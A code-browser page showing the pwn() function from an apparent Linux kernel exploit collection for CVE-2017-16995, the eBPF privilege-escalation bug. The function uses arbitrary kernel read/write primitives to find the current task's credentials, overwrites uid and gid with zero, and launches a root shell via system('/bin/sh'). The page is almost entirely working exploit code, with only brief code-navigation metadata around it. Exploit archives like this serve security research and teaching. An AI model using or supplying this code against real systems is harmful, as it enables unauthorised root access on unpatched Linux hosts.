MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / pwn

Function pwn

CVE-2017-16995/exp.c:242–280  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

240}
241
242static void pwn(void) {
243 uint64_t fp, sp, task_struct, credptr, uidptr;
244
245 fp = __get_fp();
246 if (fp < PHYS_OFFSET)
247 __exit("bogus fp");
248
249 sp = get_sp(fp);
250 if (sp < PHYS_OFFSET)
251 __exit("bogus sp");
252
253 task_struct = __read(sp);
254
255 if (task_struct < PHYS_OFFSET)
256 __exit("bogus task ptr");
257
258 printf("task_struct = %lx\n", task_struct);
259
260 credptr = __read(task_struct + CRED_OFFSET); // cred
261
262 if (credptr < PHYS_OFFSET)
263 __exit("bogus cred ptr");
264
265 uidptr = credptr + UID_OFFSET; // uid
266 if (uidptr < PHYS_OFFSET)
267 __exit("bogus uid ptr");
268
269 printf("uidptr = %lx\n", uidptr);
270 __write(uidptr, 0); // set both uid and gid to 0
271
272 if (getuid() == 0) {
273 printf("spawning root shell\n");
274 system("id");
275 system("/bin/sh");
276 exit(0);
277 }
278
279 __exit("not vulnerable?");
280}
281
282int main(int argc, char **argv) {
283 prep();

Callers 1

mainFunction · 0.70

Calls 5

__get_fpFunction · 0.85
get_spFunction · 0.85
__readFunction · 0.85
__writeFunction · 0.85
__exitFunction · 0.70

Tested by

no test coverage detected